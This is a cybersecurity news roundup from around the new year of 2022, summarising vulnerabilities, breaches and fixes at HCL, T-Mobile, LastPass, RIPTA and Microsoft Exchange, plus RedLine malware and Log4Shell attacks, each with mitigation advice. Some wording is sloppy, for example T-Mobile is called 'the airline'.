There’s no way to sugarcoat it; cybercrime is only worsening as we get more connected to the internet. Ransomware had a big year in 2021, and it’s virtually guaranteed that 2022 will surpass it. This year, defenders will not only need to pay closer attention to the attack vectors they’re presently monitoring, but they’ll also need to broaden their scope to include new targets.
This article seeks to explore the most popular and the latest Information security and cybersecurity news over the past week.
- HCL DX Vulnerabilities Patches in HCL Technologies
A few months earlier, researchers noticed that HCL Digital Experience (DX), a platform for creating and administering online portals, contains several vulnerabilities that might lead to remote code execution (RCE).
According to a blog post published on December 26 by Australian attack surface management firm Assetnote, the vendor, HCL Technologies, initially indicated it couldn’t duplicate the problems, which were all server-side request forgery (SSRF) flaws.
On December 30, five days after the Asset note’s disclosure, HCL Software, a division of HCL Technologies, issued a security advisory with remedies for an SSRF bug credited to Shah and a related inefficient regular expression vulnerability. According to a security advisory provided by Assetnote, an attacker might pivot to the internal network and access cloud metadata endpoints to gain cloud credentials.
According to Shah, unauthenticated attackers might gain command execution by submitting a malicious zip file that, once unpacked, is subject to directory traversal and hence arbitrary file upload.
Mitigation
In the absence of system updates, Shah claims that WAF rules cannot be relied on to prevent the holes from being exploited. Instead, he recommended that customers change all proxy-config.xml files in their Websphere Portal installation to allow no origins. They remove several folders listed in the blog post if their functionality is no longer required.
- SSD at risk of Firmware Malware attack
Researchers in Korea have created a set of assaults against various solid-state disks (SSDs) that could allow malware to be planted in a position that is beyond the user’s and security solutions’ reach. According to an article released by the Bleeping computer on December 30, The attack models are designed for drives with flex capacity characteristics and target a hidden part of the device known as over-provisioning, which is commonly employed by SSD manufacturers to boost performance on NAND flash-based storage systems these days, according to cyber security news.
How flexible capacity works
Micron Technology’s Flex Capacity technology allows storage devices to automatically modify by absorbing write workload volumes, raw and user-allocated space sizes can be used to increase performance. Over-provisioning is a dynamic system that produces and changes a space buffer that typically occupies 7% to 25% of the total disk capacity.
The operating system and any applications running on it, including security and antivirus technologies, are unaware of the over-provisioning region. The SSD manager dynamically adjusts this space against the workloads when the user launches different apps, based on how write-intensive or read-intensive they are.
Countermeasures
As a deterrent to the first kind of attack, the researchers advise that SSD makers clear the OP area with a pseudo-erase method that has no effect on real-time performance.
Implementing valid-invalid data rate monitoring systems that monitor the ratio inside SSDs in real-time could also be an effective security measure against the second sort of assault of introducing malware in the OP area. If the invalid data ratio suddenly climbs significantly, the user may receive a warning and the option of using a verifiable data-wiping mechanism in the OP area.
Finally, there should be strong protection against unwanted access to the SSD management app.
- 441K Accounts stolen by RedLine Malware now available at Have I Been Pwned Site
Have I Been Pwned, Check if your email and password were among the 441,000 accounts stolen in a data-stealing operation using the RedLine malware, thanks to a data breach notification tool.
According to an article released by the Bleeping Computer cybersecurity news on December 30, RedLine is the most extensively used data-stealing virus at the moment, spreading via phishing operations. The RedLine malware will attempt to steal cookies, credentials, credit cards, and autocomplete information from browsers once it has been installed. It can also download new software or run instructions on the infected system and steal credentials stored in VPN and FTP clients. It can also steal bitcoin wallets.
The stolen data is combined into a “logs” bundle and sent to a remote server, where the attacker can retrieve it at any time. Attackers use these records to either corrupt more accounts or sell them for as little as $5 per login.on dark web criminal marketplaces. The logs from RedLine have been made public.
Have I Been Pwned may now search the RedLine data for 441,657 unique email addresses taken by RedLine.
Unfortunately, changing the passwords linked with your email account isn’t adequate if your email address is recorded in the RedLine malware records. You must update the passwords for all accounts used on the machine, including company VPN and email accounts, as well as additional personal ones, because RedLine targets all of your data.
Finally, if your email address appears in the RedLine data, you should run an antivirus scan on your computer to detect and remove any malware.
- Chinese APT Hackers Targeted Academic Institutions with the Log4Shell Exploit
According to CrowdStrike latest cybersecurity news released on December 29, a Chinese hacker group known for industrial espionage and information gathering used a Log4j vulnerability to target a major academic institution.
Log4j is a widely used open-source software tool in the tech industry, with millions of installations, making it difficult to trace the whole scope of possible victims. When the vulnerability was discovered earlier this month, cybercriminals rushed to exploit it, meaning that even if firms fixed their systems, attackers might have already gained a foothold.
After getting access via a customized version of a Log4j attack for VMWare Horizon, a virtual workspace technology, threat analysts spotted the group attempting to install malware. The Chinese hackers were also seeking to collect credentials for further exploitation.
Aquatic Panda, a previously unknown China-based targeted intrusion adversary was uncovered leveraging severe vulnerabilities in the Apache Log4j logging library as an access vector to perform various post-exploitation actions on targeted systems, including surveillance and credential harvesting.
However, after being notified of the breach, the victim organization could promptly apply their incident response methodology, Eventually, the vulnerable program will be patched, and further threat actor activity on the host will be blocked. The specific goal of the attack remains unknown, even though it was successfully disrupted.
- Customer information and SIM cards were compromised in another T-Mobile incident.
In August, T-Mobile was hit by another cyberattack following a significant data leak. According to the latest cybersecurity news released by The Verge on December 28, attackers gained access to a tiny number of users’ accounts this time.
Customers were either victim of a SIM switching attack (which might let someone bypass SMS-based two-factor authentication), had personal plan information leaked, or both. Customers’ billing account name, phone and account number, and information about their plan, including how many lines were tied to their account, were examined among the customer’s proprietary network information.
This summer, the airline announced that a data breach exposed about 50 million customers’ personal information, with the attacker gaining access to social security numbers, names, and dates of birth. The data allegedly exposed in the December breach is less sensitive (although the documents state that consumers who had their SIMs replaced have recovered access), which is likely not as extensive. We couldn’t discover many instances from customers claiming to have received notification letters.
T-support Mobile’s account appears to have verified the breach, responding to people on Twitter to claim it’s taking urgent action to assist anyone harmed by the attack.
- LastPass allays fears of a cyber-attack by blaming an email notification spike on a “glitch.”
Following a recent spike in blocked login attempts, LastPass has initiated an investigation.
Attempts to log in using a different browser version, device, or location would normally result in notifications being sent to a pre-registered email address. Users who get these emails will be led to a URL where they may confirm whether or not the attempted login was successful.
When LastPass saw an unexpected surge in the amount of disallowed access emails, they decided to investigate, it assumed it was the consequence of a credential stuffing attempt. The strategy is based on consumers’ standard yet insecure practice using the same password and login combination across many websites.
According to the most recent cybersecurity news from LastPass, there was no evidence that any of its users’ accounts had been hacked or otherwise compromised during the initial examination. The Daily Swig cybersecurity news quickly looked into this activity and at this time, there is no evidence that any LastPass accounts have been compromised by an unauthorized third-party as a result of the credential stuffing efforts, nor that any user’s LastPass credentials have been stolen by malware, rogue browser extensions, or phishing attacks.
According to the cloud-based password management service, the rise in forbidden password email warnings was due to a technical issue rather than criminal conduct.
- The RIPTA data breach exposes unidentified PII.
The Rhode Island Public Transit Authority (RIPTA) announced a data breach on December 29 that exposed a disputed number of people’s names, social security numbers, residences, birthdates, Medicare information, health insurance member identification numbers, and claims information.
Non-RIPTA employees impacted by the data breach all claimed to have worked for the state at some point. The compromise affected nearly 5,000 persons, according to the US Department of Health and Human Services’ website, which displays reported data breach information. According to RIPTA, the cyber-attack affected 17,378 persons; the letter addressed to an individual affected by the hack.
- Microsoft has released a fix for the Exchange Y2K22 bug that caused email delivery to be disrupted.
Microsoft released its latest cybersecurity repair on January 2, 2022, to resolve an issue that caused email messages to become trapped on its Exchange Server platforms around the turn of the year, which it blamed on a data validation problem.
The problem affected on-premises versions of Exchange Server 2016 and Exchange Server 2019, although Microsoft didn’t say how prevalent the problem was. As 2022 approached, the problem became more visible, leading the servers to stop delivering email messages and display an error message. The problem was triggered by a date issue in a signature file used by the malware scanning engine in Exchange.
To address the Y2K22 issue, Microsoft recommends that clients download “Reset-ScanEngineVersion.ps1,” a PowerShell-based scan engine reset script that may be run on each Exchange mailbox server that downloads antimalware upgrades. It’s worth noting that the upgrade also brings the engine’s version number up to 2112330001.
Microsoft fully supports the newly improved scanning engine. The scanning engine version was not rolled back; instead, it was rolled forward into this new sequence, as Microsoft needs to work on it in the long run. In this new process, the scanning engine will continue to receive updates.
Sources
https://portswigger.net/daily-swig/hcl-technologies-patches-serious-vulnerabilities-in-hcl-dx
https://thehackernews.com/2021/12/chinese-apt-hackers-used-log4shell.html
https://www.securitymagazine.com/articles/96814-ripta-data-breach-compromises-unexplained-pii
https://thehackernews.com/2022/01/microsoft-issues-fix-for-exchange-y2k22.html
The opinions expressed in this post belongs to the individual contributors and do not necessarily reflect the views of Information Security Buzz.